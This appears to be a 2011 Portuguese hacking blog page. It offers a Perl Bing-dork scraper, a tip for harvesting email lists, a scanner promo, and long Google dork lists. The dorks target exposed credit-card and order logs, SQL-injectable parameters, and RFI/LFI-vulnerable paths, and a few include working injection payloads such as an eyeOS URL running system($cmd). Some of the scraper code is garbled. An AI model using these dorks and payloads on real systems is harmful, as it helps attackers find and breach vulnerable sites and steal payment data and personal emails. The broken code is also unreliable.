domingo, 6 de março de 2011

Scanner dork em perl

Ele pode ser usado tando em OS-win como OS-linux
para usar em OS-win baixe o Activeperl, e utilizando dorks simples para seu scan.

Fonte do dork: http://forum.guiadohacker.com.br
Criador:PS1C0

SCANNER DORK

#!/usr/bin/perl 
 use LWP::UserAgent; 
 
 print "Specify dork: "; 
 $dork = ; 
 chomp($dork); 
 for ($i = 0; $i < 1000; $i += 10) { 
 $b = LWP::UserAgent->new(agent => 'Mozilla/4.8 [en] (Windows NT 6.0; U)'); 
 $b->timeout(30); 
 $b->env_proxy; 
 $c = $b->get('http://www.bing.com/search?q=' . $dork . '&first=' . $i . '&FORM=PERE')->content; 
 $check = index($c, 'sb_pagN'); 
 while (1) { 
 $n = index($c, ' if ($n == -1) { 
 last; 
 } 
 $c = substr($c, $n + 13); 
 $s = substr($c, 0, index($c, '"')); 
 print $s, "\n"; 
 } 
 if ($check == -1) { 
 last; 
 } 
 } 

Um simples dork para quem gosta de extrair listmail de sites com essa simples dork vai da uma grande ajuda.
Muitos desses dos link's acessados vem com nomes,datas,senhas, como um banco de dados
por isso disponho de uma ferramenta pra extração de email dos mesmos.
EXTRACTOR DE EMAIL ONLINE.
Link:http://www.googlebig.com/sections/Email-Extractor/

Código pesquisa:+mail +@ +yahoo +hotmail +gmail ext:txt

sábado, 26 de fevereiro de 2011

Netsparker: um scanner de segurança web livre de falsos-positivos

O Netsparker é um scanner de segurança de aplicações web que, de acordo com os desenvolvedores, é completamente livre de falsos- positivos. De acordo com eles, o Netsparker possui uma nova tecnologia que pode confirmar as vulnerabilidades sob demanda, por isso é imune a falso-positivo.

Por exemplo, quando o Netsparker identifica um SQL Injection, ele consegue identificar como explorar a falha automaticamente e extrair a versão da aplicação. Quando este dado for extraído com sucesso, o programa vai informar que a falha foi confirmada.

O Netsparker consegue simular um atacante real com grande sucesso. Assim, consegue atacar sites que utilizam AJAX e JavaScript.

Embora o Netsparker seja pago, existe uma versão "Community" que compartilha muitas das funcionalidades presentes na versão paga. É capaz de detectar SQL Injection e XSS (Cross Site Scripting).

Infelizmente, o Netsparker não funciona no Linux. Ele suporta Windows XP (SP2 ou mais recente), Windows 7, Windows Vista (SP1 ou mais recente), Windows Server 2003 (SP1 ou mais recente) e Windows Server 2008 e precisa de Internet Explorer e .NET Framework 3.5 SP1 na máquina.

download : http://www.mavitunasecurity.com/communityedition/

BANCO DE STRINGS

Banco de Strings SQL ERROS
Conjunto de Strings Que expõe erros SQL em determinados sites.
OBS:BOM PARA SQL INJECTION.

Banco de Strings Busca MÚSICAS
Conjunto de Strings Que expõe diretórios / pastas / com arquivos de mídia.

Banco de Strings Busca PASSWORD
Conjunto de Strings Que expõe diretórios / pastas / com arquivos de senhas ou privilégios de edição.

Banco de Strings Busca CÂMERAS & WEB-CAN
Conjunto de Strings Que expõe Câmeras de vigilância & Web-Can's.

Click aqui e tenha acesso a muito mais dorks

Dorks variadas

/~gcw/cgi-bin/Count.cgi?df=callcard.dat
/cgi-bin/PDG_Cart/shopper.conf
/cgi-local/PDG_Cart/shopper.conf
/cgi-bin/PDG_Cart/order.log
/PDG_Cart/order.log
/cgi-bin/cart32.exe/cart32clientlist
/cgi-bin/Count.cgi?df=callcard.dat
/cgi/PDG_Cart/order.log
/PDG_Cart/authorizenets.txt
/cgi-bin/PDG_Cart/mc.txt
/PDG/order.txt
/cgi-bin/PDG_cart/card.txt
/PDG_Cart/shopper.conf
/php/mlog.phtml
/php/mylog.phtml
/webcart/carts
/cgi-bin/orders.txt
/WebShop/logs
/cgi-bin/AnyForm2
/cgi-bin/mc.txt
/ccbill/secure/ccbill.log
/cgi-bin/orders/mc.txt
/WebCart/orders.txt
/cgi-bin/orders/cc.txt
/cvv2.txt
/cgi-bin/orderlog.txt
/WebShop/logs
/orderb/shop.mdb
/_private/shopping_cart.mdb
/scripts/iisadmin/tools/mkilog.exe
/cool-logs/mylog.html
/cool-logs/mlog.html
/easylog/easylog.html
/HyperStat/stat_what.log
/mall_log_files/
/scripts/weblog

inurl:(0x3a,version
    inurl:(@version,0x3a,databse)
    inurl:(user,0x3a,pass)
    inurl:+union+select+ from
    inurl:+union+select+ pass
    inurl:+union+select+ SHOP
    inurl:+union+select+ admin
    inurl:index.php?id=
    inurl:trainers.php?id=
    inurl:buy.php?category=
    inurl:article.php?ID=
    inurl:play_old.php?id=
    inurl:declaration_more.php?decl_id=
    inurl:pageid=
    inurl:games.php?id=
    inurl:page.php?file=
    inurl:newsDetail.php?id=
    inurl:gallery.php?id=
    inurl:article.php?id=
    inurl:show.php?id=
    inurl:staff_id=
    inurl:newsitem.php?num=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:historialeer.php?num=
    inurl:reagir.php?num=
    inurl:Stray-Questions-View.php?num=
    inurl:forum_bds.php?num=
    inurl:game.php?id=
    inurl:view_product.php?id=
    inurl:newsone.php?id=
    inurl:sw_comment.php?id=
    inurl:news.php?id=
    inurl:avd_start.php?avd=
    inurl:event.php?id=
    inurl:product-item.php?id=
    inurl:sql.php?id=
    inurl:news_view.php?id=
    inurl:select_biblio.php?id=
    inurl:humor.php?id=
    inurl:aboutbook.php?id=
    inurl:ogl_inet.php?ogl_id=
    inurl:fiche_spectacle.php?id=
    inurl:communique_detail.php?id=
    inurl:sem.php3?id=
    inurl:kategorie.php4?id=
    inurl:news.php?id=
    inurl:index.php?id=
    inurl:faq2.php?id=
    inurl:show_an.php?id=
    inurl:preview.php?id=
    inurl:loadpsb.php?id=
    inurl:opinions.php?id=
    inurl:spr.php?id=
    inurl:pages.php?id=
    inurl:announce.php?id=
    inurl:clanek.php4?id=
    inurl:participant.php?id=
    inurl:download.php?id=
    inurl:main.php?id=
    inurl:review.php?id=
    inurl:chappies.php?id=
    inurl:read.php?id=
    inurl:prod_detail.php?id=
    inurl:viewphoto.php?id=
    inurl:article.php?id=
    inurl:person.php?id=
    inurl:productinfo.php?id=
    inurl:showimg.php?id=
    inurl:view.php?id=
    inurl:website.php?id=
    inurl:hosting_info.php?id=
    inurl:gallery.php?id=
    inurl:rub.php?idr=
    inurl:view_faq.php?id=
    inurl:artikelinfo.php?id=
    inurl:detail.php?ID=
    inurl:index.php?=
    inurl:profile_view.php?id=
    inurl:category.php?id=
    inurl:publications.php?id=
    inurl:fellows.php?id=
    inurl:downloads_info.php?id=
    inurl:prod_info.php?id=
    inurl:shop.php?do=part&id=
    inurl:productinfo.php?id=
    inurl:collectionitem.php?id=
    inurl:band_info.php?id=
    inurl:product.php?id=
    inurl:releases.php?id=
    inurl:ray.php?id=
    inurl:produit.php?id=
    inurl:pop.php?id=
    inurl:shopping.php?id=
    inurl:productdetail.php?id=
    inurl:post.php?id=
    inurl:viewshowdetail.php?id=
    inurl:clubpage.php?id=
    inurl:memberInfo.php?id=
    inurl:section.php?id=
    inurl:theme.php?id=
    inurl:page.php?id=
    inurl:shredder-categories.php?id=
    inurl:tradeCategory.php?id=
    inurl:product_ranges_view.php?ID=
    inurl:shop_category.php?id=
    inurl:transcript.php?id=
    inurl:channel_id=
    inurl:item_id=
    inurl:newsid=
    inurl:trainers.php?id=
    inurl:news-full.php?id=
    inurl:news_display.php?getid=
    inurl:index2.php?option=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:newsone.php?id=
    inurl:event.php?id=
    inurl:product-item.php?id=
    inurl:sql.php?id=
    inurl:aboutbook.php?id=
    inurl:preview.php?id=
    inurl:loadpsb.php?id=
    inurl:pages.php?id=
    inurl:material.php?id=
    inurl:clanek.php4?id=
    inurl:announce.php?id=
    inurl:chappies.php?id=
    inurl:read.php?id=
    inurl:viewapp.php?id=
    inurl:viewphoto.php?id=
    inurl:rub.php?idr=
    inurl:galeri_info.php?l=
    inurl:review.php?id=
    inurl:iniziativa.php?in=
    inurl:curriculum.php?id=
    inurl:labels.php?id=
    inurl:story.php?id=
    inurl:look.php?ID=
    inurl:newsone.php?id=
    inurl:aboutbook.php?id=
    inurl:material.php?id=
    inurl:opinions.php?id=
    inurl:announce.php?id=
    inurl:rub.php?idr=
    inurl:galeri_info.php?l=
    inurl:tekst.php?idt=
    inurl:newscat.php?id=
    inurl:newsticker_info.php?idn=
    inurl:rubrika.php?idr=
    inurl:rubp.php?idr=
    inurl:offer.php?idf=
    inurl:art.php?idm=
    inurl:title.php?id=
    inurl:recruit_details.php?id=
    inurl:index.php?cPath=

    ASP DORK
    nurl:”add.asp?bookid=”
    inurl:”add_cart.asp?num=”
    inurl:”addcart.asp?”
    inurl:”addItem.asp”
    inurl:”add-to-cart.asp?ID=”
    inurl:”addToCart.asp?idProduct=”
    inurl:”addtomylist.asp?ProdId=”
    inurl:”adminEditProductFields.asp?intProdID=”
    inurl:”advSearch_h.asp?idCategory=”
    inurl:”affiliate.asp?ID=”
    inurl:”affiliate-agreement.cfm?storeid=”
    inurl:”affiliates.asp?id=”
    inurl:”ancillary.asp?ID=”
    inurl:”archive.asp?id=”
    inurl:”article.asp?id=”
    inurl:”aspx?PageID”
    inurl:”basket.asp?id=”
    inurl:”Book.asp?bookID=”
    inurl:”book_list.asp?bookid=”
    inurl:”book_view.asp?bookid=”
    inurl:”BookDetails.asp?ID=”
    inurl:”browse.asp?catid=”
    inurl:”browse_item_details.asp”
    inurl:”Browse_Item_Details.asp?Store_Id=”
    inurl:”buy.asp?”
    inurl:”buy.asp?bookid=”
    inurl:”bycategory.asp?id=”
    inurl:”cardinfo.asp?card=”
    inurl:”cart.asp?action=”
    inurl:”cart.asp?cart_id=”
    inurl:”cart.asp?id=”
    inurl:”cart_additem.asp?id=”
    inurl:”cart_validate.asp?id=”
    inurl:”cartadd.asp?id=”
    inurl:”cat.asp?iCat=”
    inurl:”catalog.asp”
    inurl:”catalog.asp?CatalogID=”
    inurl:”catalog_item.asp?ID=”
    inurl:”catalog_main.asp?catid=”
    inurl:”category.asp”
    inurl:”category.asp?catid=”
    inurl:”category_list.asp?id=”
    inurl:”categorydisplay.asp?catid=”
    inurl:”checkout.asp?cartid=”
    inurl:”checkout.asp?UserID=”
    inurl:”checkout_confirmed.asp?order_id=”
    inurl:”checkout1.asp?cartid=”
    inurl:”comersus_listCategoriesAndProducts.asp?idCategory =”
    inurl:”comersus_optEmailToFriendForm.asp?idProduct=”
    inurl:”comersus_optReviewReadExec.asp?idProduct=”
    inurl:”comersus_viewItem.asp?idProduct=”
    inurl:”comments_form.asp?ID=”
    inurl:”contact.asp?cartId=”
    inurl:”content.asp?id=”
    inurl:”customerService.asp?TextID1=”
    inurl:”default.asp?catID=”
    inurl:”description.asp?bookid=”
    inurl:”details.asp?BookID=”
    inurl:”details.asp?Press_Release_ID=”
    inurl:”details.asp?Product_ID=”
    inurl:”details.asp?Service_ID=”
    inurl:”display_item.asp?id=”
    inurl:”displayproducts.asp”
    inurl:”downloadTrial.asp?intProdID=”
    inurl:”emailproduct.asp?itemid=”
    inurl:”emailToFriend.asp?idProduct=”
    inurl:”events.asp?ID=”
    inurl:”faq.asp?cartID=”
    inurl:”faq_list.asp?id=”
    inurl:”faqs.asp?id=”
    inurl:”feedback.asp?title=”
    inurl:”freedownload.asp?bookid=”
    inurl:”fullDisplay.asp?item=”
    inurl:”getbook.asp?bookid=”
    inurl:”GetItems.asp?itemid=”
    inurl:”giftDetail.asp?id=”
    inurl:”help.asp?CartId=”
    inurl:”home.asp?id=”
    inurl:”index.asp?cart=”
    inurl:”index.asp?cartID=”
    inurl:”index.asp?ID=”
    inurl:”info.asp?ID=”
    inurl:”item.asp?eid=”
    inurl:”item.asp?item_id=”
    inurl:”item.asp?itemid=”
    inurl:”item.asp?model=”
    inurl:”item.asp?prodtype=”
    inurl:”item.asp?shopcd=”
    inurl:”item_details.asp?catid=”
    inurl:”item_list.asp?maingroup”
    inurl:”item_show.asp?code_no=”
    inurl:”itemDesc.asp?CartId=”
    inurl:”itemdetail.asp?item=”
    inurl:”itemdetails.asp?catalogid=”
    inurl:”learnmore.asp?cartID=”
    inurl:”links.asp?catid=”
    inurl:”list.asp?bookid=”
    inurl:”List.asp?CatID=”
    inurl:”listcategoriesandproducts.asp?idCategory=”
    inurl:”modline.asp?id=”
    inurl:”myaccount.asp?catid=”
    inurl:”news.asp?id=”
    inurl:”order.asp?BookID=”
    inurl:”order.asp?id=”
    inurl:”order.asp?item_ID=”
    inurl:”OrderForm.asp?Cart=”
    inurl:”page.asp?PartID=”
    inurl:”payment.asp?CartID=”
    inurl:”pdetail.asp?item_id=”
    inurl:”powersearch.asp?CartId=”
    inurl:”privacy.asp?cartID=”
    inurl:”prodbycat.asp?intCatalogID=”
    inurl:”prodetails.asp?prodid=”
    inurl:”prodlist.asp?catid=”
    inurl:”product.asp?bookID=”
    inurl:”product.asp?intProdID=”
    inurl:”product_info.asp?item_id=”
    inurl:”productDetails.asp?idProduct=”
    inurl:”productDisplay.asp”
    inurl:”productinfo.asp?item=”
    inurl:”productlist.asp?ViewType=Category&CategoryID= “
    inurl:”productpage.asp”
    inurl:”products.asp?ID=”
    inurl:”products.asp?keyword=”
    inurl:”products_category.asp?CategoryID=”
    inurl:”products_detail.asp?CategoryID=”
    inurl:”productsByCategory.asp?intCatalogID=”
    inurl:”prodView.asp?idProduct=”
    inurl:”promo.asp?id=”
    inurl:”promotion.asp?catid=”
    inurl:”pview.asp?Item=”
    inurl:”resellers.asp?idCategory=”
    inurl:”results.asp?cat=”
    inurl:”savecart.asp?CartId=”
    inurl:”search.asp?CartID=”
    inurl:”searchcat.asp?search_id=”

    inurl:”Select_Item.asp?id=”
    inurl:”Services.asp?ID=”
    inurl:”shippinginfo.asp?CartId=”
    inurl:”shop.asp?a=”
    inurl:”shop.asp?action=”
    inurl:”shop.asp?bookid=”
    inurl:”shop.asp?cartID=”
    inurl:”shop_details.asp?prodid=”
    inurl:”shopaddtocart.asp”
    inurl:”shopaddtocart.asp?catalogid=”
    inurl:”shopbasket.asp?bookid=”
    inurl:”shopbycategory.asp?catid=”
    inurl:”shopcart.asp?title=”
    inurl:”shopcreatorder.asp”
    inurl:”shopcurrency.asp?cid=”
    inurl:”shopdc.asp?bookid=”
    inurl:”shopdisplaycategories.asp”
    inurl:”shopdisplayproduct.asp?catalogid=”
    inurl:”shopdisplayproducts.asp”
    inurl:”shopexd.asp”
    inurl:”shopexd.asp?catalogid=”
    inurl:”shopping_basket.asp?cartID=”
    inurl:”shopprojectlogin.asp”
    inurl:”shopquery.asp?catalogid=”
    inurl:”shopremoveitem.asp?cartid=”
    inurl:”shopreviewadd.asp?id=”
    inurl:”shopreviewlist.asp?id=”
    inurl:”ShopSearch.asp?CategoryID=”
    inurl:”shoptellafriend.asp?id=”
    inurl:”shopthanks.asp”
    inurl:”shopwelcome.asp?title=”
    inurl:”show_item.asp?id=”
    inurl:”show_item_details.asp?item_id=”
    inurl:”showbook.asp?bookid=”
    inurl:”showStore.asp?catID=”
    inurl:”shprodde.asp?SKU=”
    inurl:”specials.asp?id=”
    inurl:”store.asp?id=”
    inurl:”store_bycat.asp?id=”
    inurl:”store_listing.asp?id=”
    inurl:”Store_ViewProducts.asp?Cat=”
    inurl:”store-details.asp?id=”
    inurl:”storefront.asp?id=”
    inurl:”storefronts.asp?title=”
    inurl:”storeitem.asp?item=”
    inurl:”StoreRedirect.asp?ID=”
    inurl:”subcategories.asp?id=”
    inurl:”tek9.asp?”
    inurl:”template.asp?Action=Item&pid=”
    inurl:”topic.asp?ID=”
    inurl:”tuangou.asp?bookid=”
    inurl:”type.asp?iType=”
    inurl:”updatebasket.asp?bookid=”
    inurl:”updates.asp?ID=”
    inurl:”view.asp?cid=”
    inurl:”view_cart.asp?title=”
    inurl:”view_detail.asp?ID=”
    inurl:”viewcart.asp?CartId=”
    inurl:”viewCart.asp?userID=”
    inurl:”viewCat_h.asp?idCategory=”
    inurl:”viewevent.asp?EventID=”
    inurl:”viewitem.asp?recor=”
    inurl:”viewPrd.asp?idcategory=”
    inurl:”ViewProduct.asp?misc=”
    inurl:”voteList.asp?item_ID=”
    inurl:”whatsnew.asp?idCategory=”
    inurl:”WsAncillary.asp?ID=”

    SQL DORK

    inurl:”id=” & intext:”Warning: mysql_fetch_assoc()
    inurl:”id=” & intext:”Warning: mysql_fetch_array()
    inurl:”id=” & intext:”Warning: mysql_num_rows()
    inurl:”id=” & intext:”Warning: session_start()
    inurl:”id=” & intext:”Warning: getimagesize()
    inurl:”id=” & intext:”Warning: is_writable()
    inurl:”id=” & intext:”Warning: getimagesize()
    inurl:”id=” & intext:”Warning: Unknown()
    inurl:”id=” & intext:”Warning: session_start()
    inurl:”id=” & intext:”Warning: mysql_result()
    inurl:”id=” & intext:”Warning: pg_exec()
    inurl:”id=” & intext:”Warning: mysql_result()
    inurl:”id=” & intext:”Warning: mysql_num_rows()
    inurl:”id=” & intext:”Warning: mysql_query()
    inurl:”id=” & intext:”Warning: array_merge()
    inurl:”id=” & intext:”Warning: preg_match()
    inurl:”id=” & intext:”Warning: ilesize()
    inurl:”id=” & intext:”Warning: filesize()
    inurl:”id=” & intext:”Warning: filesize()
    inurl:”id=” & intext:”Warning: require()
    inurl:(0x3a,version
    inurl:(@version,0x3a,databse)
    inurl:(user,0x3a,pass)
    inurl:+union+select+ from
    inurl:+union+select+ pass
    inurl:+union+select+ SHOP
    inurl:+union+select+ admin
    inurl:index.php?id=
    inurl:trainers.php?id=
    inurl:buy.php?category=
    inurl:article.php?ID=
    inurl:play_old.php?id=
    inurl:declaration_more.php?decl_id=
    inurl:pageid=
    inurl:games.php?id=
    inurl:page.php?file=
    inurl:newsDetail.php?id=
    inurl:gallery.php?id=
    inurl:article.php?id=
    inurl:show.php?id=
    inurl:staff_id=
    inurl:newsitem.php?num=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:historialeer.php?num=
    inurl:reagir.php?num=
    inurl:Stray-Questions-View.php?num=

    RFI AND LFI

    RFI
    inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

    inurl:/include/new-visitor.inc.php?lvc_include_dir=

    inurl:/_functions.php?prefix=

    inurl:/cpcommerce/_functions.php?prefix=

    inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=

    inurl:/modules/agendax/addevent.inc.php?agendax_path=

    inurl:/ashnews.php?pathtoashnews=

    inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=

    inurl:/pm/lib.inc.php?pm_path=

    inurl:/b2-tools/gm-2-b2.php?b2inc=

    inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

    inurl:/modules/agendax/addevent.inc.php?agendax_path=

    inurl:/includes/include_once.php?include_file=

    inurl:/e107/e107_handlers/secure_img_render.php?p=

    inurl:/shoutbox/expanded.php?conf=

    inurl:/main.php?x=

    inurl:/myPHPCalendar/admin.php?cal_dir=

    inurl:/index.php/main.php?x=

    inurl:/index.php?include=

    inurl:/index.php?x=

    inurl:/index.php?open=

    inurl:/index.php?visualizar=

    inurl:/template.php?pagina=

    inurl:/index.php?pagina=

    inurl:/index.php?inc=

    inurl:/includes/include_onde.php?include_file=

    inurl:/index.php?page=

    inurl:/index.php?pg=

    inurl:/index.php?show=

    inurl:/index.php?cat=

    inurl:/index.php?file=

    inurl:/db.php?path_local=

    inurl:/index.php?site=

    inurl:/htmltonuke.php?filnavn=

    inurl:/livehelp/inc/pipe.php?HCL_path=

    inurl:/hcl/inc/pipe.php?HCL_path=

    inurl:/inc/pipe.php?HCL_path=

    inurl:/support/faq/inc/pipe.php?HCL_path=

    inurl:/help/faq/inc/pipe.php?HCL_path=

    inurl:/helpcenter/inc/pipe.php?HCL_path=

    inurl:/live-support/inc/pipe.php?HCL_path=

    inurl:/gnu3/index.php?doc=

    inurl:/gnu/index.php?doc=

    inurl:/phpgwapi/setup/tables_update.inc.php?appdir=

    inurl:/forum/install.php?phpbb_root_dir=

    inurl:/includes/calendar.php?phpc_root_path=

    inurl:/includes/setup.php?phpc_root_path=

    inurl:/inc/authform.inc.php?path_pre=

    inurl:/include/authform.inc.php?path_pre=

    inurl:index.php?nic=

    inurl:index.php?sec=

    inurl:index.php?content=

    inurl:index.php?link=

    inurl:index.php?filename=

    inurl:index.php?dir=

    inurl:index.php?document=

    inurl:index.php?view=

    inurl:*.php?sel=

    inurl:*.php?session=&content=

    inurl:*.php?locate=

    inurl:*.php?place=

    inurl:*.php?layout=

    inurl:*.php?go=

    inurl:*.php?catch=

    inurl:*.php?mode=

    inurl:*.php?name=

    inurl:*.php?loc=

    inurl:*.php?f=

    inurl:*.php?inf=

    inurl:*.php?pg=

    inurl:*.php?load=

    inurl:*.php?naam=

    allinurl:/index.php?page= site:*.dk

    allinurl:/index.php?file= site:*.dk

    INURL OR ALLINURL WITH:

    /temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=

    /includes/header.php?systempath=

    /Gallery/displayCategory.php?basepath=

    /index.inc.php?PATH_Includes=

    /ashnews.php?pathtoashnews=

    /ashheadlines.php?pathtoashnews=

    /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

    /demo/includes/init.php?user_inc=

    /jaf/index.php?show=

    /inc/shows.inc.php?cutepath=

    /poll/admin/common.inc.php?base_path=

    /pollvote/pollvote.php?pollname=

    /sources/post.php?fil_config=

    /modules/My_eGallery/public/displayCategory.php?basepath=

    /bb_lib/checkdb.inc.php?libpach=

    /include/livre_include.php?no_connect=lol&chem_absolu=

    /index.php?from_market=Y&pageurl=

    /modules/mod_mainmenu.php?mosConfig_absolute_path=

    /pivot/modules/module_db.php?pivot_path=

    /modules/4nAlbum/public/displayCategory.php?basepath=

    /derniers_commentaires.php?rep=

    /modules/coppermine/themes/default/theme.php?THEME_DIR=

    /modules/coppermine/include/init.inc.php?CPG_M_DIR=

    /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=

    /coppermine/themes/maze/theme.php?THEME_DIR=

    /allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

    /allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=

    /myPHPCalendar/admin.php?cal_dir=

    /agendax/addevent.inc.php?agendax_path=

    /modules/mod_mainmenu.php?mosConfig_absolute_path=

    /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=

    /main.php?page=

    /default.php?page=

    /index.php?action=

    /index1.php?p=

    /index2.php?x=

    /index2.php?content=

    /index.php?conteudo=

    /index.php?cat=

    /include/new-visitor.inc.php?lvc_include_dir=

    /modules/agendax/addevent.inc.php?agendax_path=

    /shoutbox/expanded.php?conf=

    /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

    /pivot/modules/module_db.php?pivot_path=

    /library/editor/editor.php?root=

    /library/lib.php?root=

    /e107/e107_handlers/secure_img_render.php?p=

    /zentrack/index.php?configFile=

    /main.php?x=

    /becommunity/community/index.php?pageurl=

    /GradeMap/index.php?page=

    /index4.php?body=

    /side/index.php?side=

    /main.php?page=

    /es/index.php?action=

    /index.php?sec=

    /index.php?main=

    /index.php?sec=

    /index.php?menu=

    /html/page.php?page=

    /page.php?view=

    /index.php?menu=

    /main.php?view=

    /index.php?page=

    /content.php?page=

    /main.php?page=

    /index.php?x=

    /main_site.php?page=

    /index.php?L2=

    /content.php?page=

    /main.php?page=

    /index.php?x=

    /main_site.php?page=

    /index.php?L2=

    /index.php?show=

    /tutorials/print.php?page=

    /index.php?page=

    /index.php?level=

    /index.php?file=

    /index.php?inter_url=

    /index.php?page=

    /index2.php?menu=

    /index.php?level=

    /index1.php?main=

    /index1.php?nav=

    /index1.php?link=

    /index2.php?page=

    /index.php?myContent=

    /index.php?TWC=

    /index.php?sec=

    /index1.php?main=

    /index2.php?page=

    /index.php?babInstallPath=

    /main.php?body=

    /index.php?z=

    /main.php?view=

    /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

    /index.php?file=

    /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

    1. allinurl:my_egallery site:.org
    /modules/My_eGallery/public/displayCategory.php?basepath=

    2. allinurl:xgallery site:.org
    /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

    3. allinurl:coppermine site:.org
    /modules/coppermine/themes/default/theme.php?THEME_DIR=

    4. allinurl:4nAlbum site:.org
    /modules/4nAlbum/public/displayCategory.php?basepath=

    5. allinurlP:NphpBB2 site:.org
    /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

    6. allinurl:ihm.php?p=

    7. Keyword : “powered by AllMyLinks”
    /include/footer.inc.php?_AMLconfig[cfg_serverpath]=

    8. allinurl:/modules.php?name=allmyguests
    /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

    9. allinurl:/Popper/index.php?
    /Popper/index.php?childwindow.inc.php?form=

    10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php
    yahoo = by Kietu? v 3.2
    /kietu/index.php?kietu[url_hit]=

    11. keyword : “Powered by phpBB 2.0.6?
    /html&highlight=%2527.include($_GET[a]),exit.%2527&a=

    12. keyword : “powered by CubeCart 3.0.6?
    /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

    13. keyword : “powered by paBugs 2.0 Beta 3?
    /class.mysql.php?path_to_bt_dir=

    14. allinurl:”powered by AshNews”, allinurl:AshNews atau allinurl: /ashnews.php
    /ashnews.php?pathtoashnews=

    15. keyword : /phorum/login.php
    /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=

    16. allinurl:ihm.php?p=*

    14. keyword : “powered eyeOs”
    /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cm d=id
    diganti dengan :
    /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5b a%5d);&a=

    15. allinurl:.php?bodyfile=

    16. allinurl:/includes/orderSuccess.inc.php?glob=
    /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

    17. allinurl:forums.html
    /modules.php?name=

    18. allinurl:/default.php?page=home

    19. allinurl:/folder.php?id=

    20. allinurl:main.php?pagina=
    /paginedinamiche/main.php?pagina=

    21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( “powered by AllMyGuests”)
    /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

    22. allinurl:application.php?base_path=
    /application.php?base_path=

    23. allinurlp:hplivehelper
    /phplivehelper/initiate.php?abs_path=

    24. allinurlp:hpnuke
    /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

    25. key word : “powered by Fantastic News v2.1.2?
    /archive.php?CONFIG[script_path]=

    26. keyword: “powered by smartblog” AND inurl:?page=login
    /index.php?page=

    27. allinurl:/forum/
    /forum/admin/index.php?inc_conf=

    28. keyword:”Powered By FusionPHP”
    /templates/headline_temp.php?nst_inc=

    29. allinurl:shoutbox/expanded.php filetypep:hp
    /shoutbox/expanded.php?conf=

    30. allinurl: /osticket/
    /osticket/include/main.php?config[search_disp]=true&include_dir=

    31. keyword : “Powered by iUser”
    /common.php?include_path=

    32. allinurl: “static.php?load=”
    /static.php?load=

    33. keyworld : /phpcoin/login.php
    /phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=

    34. keyworld: allinurl:/phpGedview/login.php site:
    /help_text_vars.php?dir&PGV_BASE_DIRECTORY=

    35. allinurl:/folder.php?id=
    /classes.php?LOCAL_PATH=
    LFI

    acion=
    act=
    action=
    API_HOME_DIR=
    board=
    cat=
    client_id=
    cmd=
    cont=
    current_frame=
    date=
    detail=
    dir=
    display=
    download=
    f=
    file=
    fileinclude=
    filename=
    firm_id=
    g=
    getdata=
    go=
    HT=
    idd=
    inc=
    incfile=
    incl=
    include_file=
    include_path=
    infile=
    info=
    ir=
    lang=
    language=
    link=
    load=
    main=
    mainspot=
    msg=
    num=
    openfile=
    p=
    page=
    pagina=
    path=
    path_to_calendar=
    pg=
    plik
    qry_str=
    ruta=
    safehtml=
    section=
    showfile=
    side=
    site_id=
    skin=
    static=
    str=
    strona=
    sub=
    tresc=
    url=
    user=


inurl:"add.asp?bookid="
inurl:"add_cart.asp?num="
inurl:"addcart.asp?"
inurl:"addItem.asp"
inurl:"add-to-cart.asp?ID="
inurl:"addToCart.asp?idProduct="
inurl:"addtomylist.asp?ProdId="
inurl:"adminEditProductFields.asp?intProdID="
inurl:"advSearch_h.asp?idCategory="
inurl:"affiliate.asp?ID="
inurl:"affiliate-agreement.cfm?storeid="
inurl:"affiliates.asp?id="
inurl:"ancillary.asp?ID="
inurl:"archive.asp?id="
inurl:"article.asp?id="
inurl:"aspx?PageID"
inurl:"basket.asp?id="
inurl:"Book.asp?bookID="
inurl:"book_list.asp?bookid="
inurl:"book_view.asp?bookid="
inurl:"BookDetails.asp?ID="
inurl:"browse.asp?catid="
inurl:"browse_item_details.asp"
inurl:"Browse_Item_Details.asp?Store_Id="
inurl:"buy.asp?"
inurl:"buy.asp?bookid="
inurl:"bycategory.asp?id="
inurl:"cardinfo.asp?card="
inurl:"cart.asp?action="
inurl:"cart.asp?cart_id="
inurl:"cart.asp?id="
inurl:"cart_additem.asp?id="
inurl:"cart_validate.asp?id="
inurl:"cartadd.asp?id="
inurl:"cat.asp?iCat="
inurl:"catalog.asp"
inurl:"catalog.asp?CatalogID="
inurl:"catalog_item.asp?ID="
inurl:"catalog_main.asp?catid="
inurl:"category.asp"
inurl:"category.asp?catid="
inurl:"category_list.asp?id="
inurl:"categorydisplay.asp?catid="
inurl:"checkout.asp?cartid="
inurl:"checkout.asp?UserID="
